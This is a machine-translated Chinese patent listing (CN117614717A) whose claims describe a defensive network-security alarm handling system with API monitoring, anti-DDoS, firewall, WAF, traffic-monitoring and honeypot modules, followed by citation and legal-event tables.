2. The system of claim 1, wherein the Api monitor module comprises an interface availability monitor unit, a performance monitor unit, a security monitor unit, an error monitor unit, a business logic monitor unit, and a first log record unit,
the interface availability monitoring unit is configured to be responsible for periodically checking the availability of the API interface and verifying returned indexes such as state codes, response time and the like;
the performance monitoring unit is configured to be responsible for measuring performance indexes of the API, and simulating and sending requests under different loads so as to evaluate performance bottlenecks and optimization requirements of the API;
the security monitoring unit is configured to be responsible for detecting the security of the API, monitoring malicious behaviors, abnormal requests and potential security vulnerabilities, and providing real-time alarms and logging;
the error monitoring unit is configured to be responsible for monitoring error codes and error messages returned by the API, and checking the error messages in the response of the API so as to discover and process error conditions in time;
the business logic monitoring unit is configured to be responsible for verifying whether the business logic of the API is correct or not, and checking whether the behavior and the result of the API under various input conditions meet the expectations or not;
the first log recording unit is configured to collect, record and analyze API monitored data, generate reports and visual charts, and display the use condition, performance index and fault condition information of the API.
3. The network security alarm event based overall process handling system of claim 1, wherein the DDOS resistant module comprises a first traffic analysis unit, a traffic cleaning unit, a load balancing unit, a first security authentication unit, a defense protocol unit, and a second logging unit,
the first flow analysis unit is configured to be responsible for monitoring and analyzing the flow entering the system in real time, and identifying and recording various types of flow;
the flow cleaning unit is configured to be responsible for filtering and cleaning the flow entering the system, and filtering malicious flow and attack flow from the flow;
the load balancing unit is configured to be responsible for balancing and distributing the flow among a plurality of servers, and dynamically adjusts according to the performance and the load condition of the servers so as to realize fairness of flow distribution;
the first security authentication unit is configured to be responsible for authenticating and authorizing a user to prevent unauthorized access and attack;
the defending protocol unit is configured to be responsible for identifying and preventing various DDOS attack protocols, and detecting and defending attack traffic;
the second logging unit is configured to be responsible for collecting, logging and analyzing DDOS-resistant data.
4. The network-based security alarm event whole process handling system according to claim 1, wherein the firewall module comprises a filtering unit, an application layer proxy unit, a state tracking unit, a VPN unit, an IDS/IPS unit, and a third logging unit,
the packet filtering unit is configured to be responsible for checking network data packets and filtering and preventing data packets which do not accord with rules according to a predefined rule set;
the application layer proxy unit is configured to be responsible for checking and filtering data above a transmission layer, and checking and filtering the transmitted data;
the state tracking unit is configured to be responsible for tracking the state of network connection, filtering and authenticating according to the state, and detecting and preventing unauthorized connection, malicious activity and abnormal behavior;
the VPN unit is configured to be used for establishing and managing secure remote connection, and encrypting and tunneling data by adopting an encryption algorithm;
the IDS/IPS unit is configured to be responsible for detecting and defending intrusion activities, monitoring network traffic and system logs, identifying abnormal behaviors and malicious attacks, and triggering alarms or taking automatic defending measures;
the third logging unit is configured to be responsible for collecting, logging and analyzing firewall data.
5. The network-based security alarm event whole process handling system according to claim 1, wherein the WAF module comprises a second traffic analysis unit, a rule engine unit, a whitelist/blacklist unit, a second security authentication unit, a file upload/download unit, an abnormal behavior detection unit, an API protection unit, and a fourth log record unit,
the second flow analysis unit is configured to be responsible for monitoring and analyzing the flow of the Web application program in real time and analyzing at least parameters, header information and load characteristics in the request;
the rule engine unit is configured to be responsible for checking request and response data according to a predefined rule set, and at least identifying and filtering malicious requests, SQL injection, cross-site scripting attack and file inclusion attack;
the white list/black list unit is configured to be responsible for managing a list which allows or forbids specific IP addresses, users, URL or HTTP methods to access Web application programs;
the second security authentication unit is configured to be responsible for authenticating and authorizing a user to prevent unauthorized access and attack;
the file uploading/downloading unit is configured to be responsible for checking and controlling the safety of file uploading and downloading, detecting the type and the size of the uploaded file and preventing the uploading and the downloading of malicious files;
the abnormal behavior detection unit is configured to detect and prevent malicious behaviors of an attacker;
the API protection unit is configured to be responsible for protecting the API from malicious behaviors and attacks;
the fourth logging unit is configured to be responsible for collecting, recording and analyzing data of the WAF.
6. The network security alarm event based overall process handling system of claim 1, wherein the traffic monitoring module comprises a data collection unit, a third traffic analysis unit, a traffic statistics unit, an alarm and alert unit, a traffic reconstruction unit, a protocol identification unit, a network topology graph unit, and a fifth logging unit,
the data acquisition unit is configured to be responsible for acquiring a data packet from a network and converting the data packet into an analyzable format;
the third flow analysis unit is configured to be responsible for monitoring and analyzing the data packet in real time;
the traffic statistics unit is configured to be responsible for counting and analyzing network traffic, and classifying and aggregating the traffic at least according to time, direction and protocol dimension;
the alarm and alert unit is configured to be responsible for detecting and triggering alarms and alerts;
the flow reconstruction unit is configured to reconstruct and optimize normal network flow so as to reduce the attack effect of an attacker;
the protocol identification unit is configured to perform protocol identification on traffic in network communication;
the network topology map is configured to map and manage physical and logical topology maps of a network;
the fifth logging unit is configured for collecting, recording and analyzing data of traffic monitoring.
7. The network-based security alarm event whole process handling system according to claim 1, wherein the honeypot module comprises a virtual machine environment unit, a service simulation unit, a threat intelligence unit, a data analysis and alarm unit, an attack-reduction-analysis unit, an adaptive honeypot unit, and a crossover honeypot unit,
the virtual machine environment unit is configured to be responsible for creating a virtual machine environment and deploying honeypots therein;
the service simulation unit is configured to be responsible for simulating various network services and deploying forged services in the honeypot so as to attract an attacker to attack;
the threat information unit is configured to be responsible for acquiring and analyzing threat information and updating an attack characteristic library in the honeypot to identify and prevent attacks;
the data analysis and alarm unit is configured to be responsible for monitoring and analyzing data in the honeypot in real time, and recording and reporting an attack behavior when an attacker tries to access the honeypot;
the attack recovery and analysis unit is configured to be responsible for recovering an attack process and analyzing an attack means, and records data traffic and command execution information in the attack process;
the self-adaptive honeypot unit is configured to simulate loopholes and configuration problems of a real system or an application program, and is used for trapping an attacker into the honeypot system and monitoring and analyzing the attack behaviors;
the spanned honey pot unit is configured for trapping and monitoring the activity of an attacker.
8. A network security alarm event based full flow treatment method applied to the treatment system of any of claims 1-7, the method comprising:
carrying out round robin on security monitoring equipment including WAF, DDOS-resistant equipment, firewall and flow monitoring equipment to obtain security alarm information;
screening out high-risk attack alarm information in the safety alarm information, performing secondary steaming and analysis on the high-risk attack alarm information, and judging whether the information is true or not;
when the high-risk attack alarm information is true, the cyclic grabbing state is an attack source to be blocked, the operation of a simulator is blocked on the boundary firewall and the DDOS-resistant equipment, and the attack IP is blocked;
and generating and archiving a problem work order according to the safety alarm information.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202311632947.XA CN117614717A (en) | 2023-12-01 | 2023-12-01 | Whole-flow handling system and method based on network security alarm event |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202311632947.XA CN117614717A (en) | 2023-12-01 | 2023-12-01 | Whole-flow handling system and method based on network security alarm event |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN117614717A true CN117614717A (en) | 2024-02-27 |
Family
ID=89953132
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202311632947.XA Pending CN117614717A (en) | 2023-12-01 | 2023-12-01 | Whole-flow handling system and method based on network security alarm event |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN117614717A (en) |
Cited By (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN117811836A (en) * | 2024-02-28 | 2024-04-02 | 北京长亭科技有限公司 | Traffic forwarding and detecting method and device |
| CN118054973A (en) * | 2024-04-11 | 2024-05-17 | 国网浙江省电力有限公司桐庐县供电公司 | Active defense method, system, equipment and medium based on internet access lock |
-
2023
- 2023-12-01 CN CN202311632947.XA patent/CN117614717A/en active Pending
Cited By (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN117811836A (en) * | 2024-02-28 | 2024-04-02 | 北京长亭科技有限公司 | Traffic forwarding and detecting method and device |
| CN117811836B (en) * | 2024-02-28 | 2024-05-28 | 北京长亭科技有限公司 | Traffic forwarding and detecting method and device |
| CN118054973A (en) * | 2024-04-11 | 2024-05-17 | 国网浙江省电力有限公司桐庐县供电公司 | Active defense method, system, equipment and medium based on internet access lock |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| Pilli et al. | Network forensic frameworks: Survey and research challenges | |
| US20030188189A1 (en) | Multi-level and multi-platform intrusion detection and response system | |
| US20050216956A1 (en) | Method and system for authentication event security policy generation | |
| CN117614717A (en) | Whole-flow handling system and method based on network security alarm event | |
| CN112398844A (en) | Flow analysis implementation method based on internal and external network real-time drainage data | |
| Beg et al. | Feasibility of intrusion detection system with high performance computing: A survey | |
| CN116827675A (en) | Network information security analysis system | |
| Kazienko et al. | Intrusion Detection Systems (IDS) Part I-(network intrusions; attack symptoms; IDS tasks; and IDS architecture) | |
| Govil et al. | Criminology of botnets and their detection and defense methods | |
| Kvarnström | A survey of commercial tools for intrusion detection | |
| KR20140078329A (en) | Method and apparatus for defensing local network attacks | |
| Limmer et al. | Survey of event correlation techniques for attack detection in early warning systems | |
| Pranggono et al. | Intrusion detection systems for critical infrastructure | |
| Lindström | Next generation security operations center | |
| Bendiab et al. | IoT Security Frameworks and Countermeasures | |
| Shyla et al. | The Geo-Spatial Distribution of Targeted Attacks sources using Honeypot Networks | |
| Singh et al. | Intrusion detection using network monitoring tools | |
| Abdulrezzak et al. | Enhancing Intrusion Prevention in Snort System | |
| Fanfara et al. | Autonomous hybrid honeypot as the future of distributed computer systems security | |
| Kaur et al. | Design & implementation of Linux based network forensic system using Honeynet | |
| Unrein et al. | Living in denial-A comparison of distributed denial of service mitigation methods | |
| Shivaprasad et al. | Enhancing Network Security through a Multi-layered Honeypot Architecture with Integrated Network Monitoring Tools | |
| CN118054973A (en) | Active defense method, system, equipment and medium based on internet access lock | |
| El Hayat | Intrusion Detection Systems: To an Optimal Hybrid Intrusion Detection System | |
| Rase et al. | Summarization of Honeypot-A Evolutionary Technology for Securing Data over Network, And Comparison with some Security Techniques |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination |